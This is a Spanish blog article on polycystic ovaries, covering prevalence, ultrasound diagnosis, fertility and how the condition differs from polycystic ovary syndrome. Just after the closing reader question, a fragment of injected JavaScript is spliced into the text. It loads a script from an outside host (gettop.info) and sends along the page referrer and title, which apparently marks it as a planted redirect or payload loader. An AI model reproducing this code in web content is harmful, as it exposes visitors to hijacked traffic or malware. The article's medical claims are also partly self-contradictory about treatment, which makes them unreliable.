Salud y belleza » Embarazo, Enfermedades, Salud

Ovario poliquístico, un problema bastante común

Sin Comentarios

ovario-poliquísticoEl ovario poliquístico no es una enfermedad, sino una afección ginecológica bastante frecuente ya que el 15% de las mujeres españolas lo padecen y que, aún así, sigue generando confusión.

Esta afección supone que hay en los ovarios folículos, que son como sacos pequeños con líquido, pero no se convierten en quistes. Por ello no hay por qué preocuparse. Se considera poliquístico cuando hay más de ocho de esos folículos.

Normalmente se dan en los dos ovarios simultáneamente, aunque ha habido casos de mujeres en las que solo se dio en uno de ellos. Suele provocar que el ovario afectado aumente de tamaño.

La pista más habitual que puede dar el ovario poliquístico es la irregularidad en la menstruación con, por ejemplo, ciclos más largos o de distinta duración. Los médicos no saben todavía por qué aparecen estos folículos, solo que el perfil de paciente habitual es el de mujer joven.

No existe tratamiento porque no es una enfermedad, pero hay que acudir al ginecólogo para que realice revisiones periódicas. Para diagnosticar los ovarios poliquísticos bastará con una ecografía en la que se verán como puntos oscuros en los ovarios.

Es posible quedarse embarazada aún padeciendo esta afección, pero es más difícil simplemente por el hecho de que los ciclos menstruales son más irregulares, por lo que es complicado determinar cuáles son los días de mayor fertilidad.

La confusión más común es entre los ovarios poliquísticos y el síndrome del ovario poliquístico, que se piensa que son lo mismo pero no lo son puesto que el síndrome es una enfermedad que también provoca irregularidad en el ciclo menstrual pero que dificulta el embarazo debido a la falta de ovulación. También se confunde habitualmente con quistes o con problemas durante el embarazo.

Sin embargo, tener ovario poliquístico no significa tener quistes en los ovarios y tampoco es una enfermedad ya que no se sufren síntomas.

Los desajustes por los ovarios poliquísticos son fáciles de controlar con un tratamiento que induzca la ovulación regular. Solo en algunos casos excepcionales los ovarios poliquísticos producen óvulos de mala calidad que dificultan el embarazo. Para saber cuál es tu caso lo mejor es que acudas al ginecólogo para que diagnostique la gravedad y los síntomas.

¿Sufres ovarios poliquísticos? ¿Cuál es tu caso?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.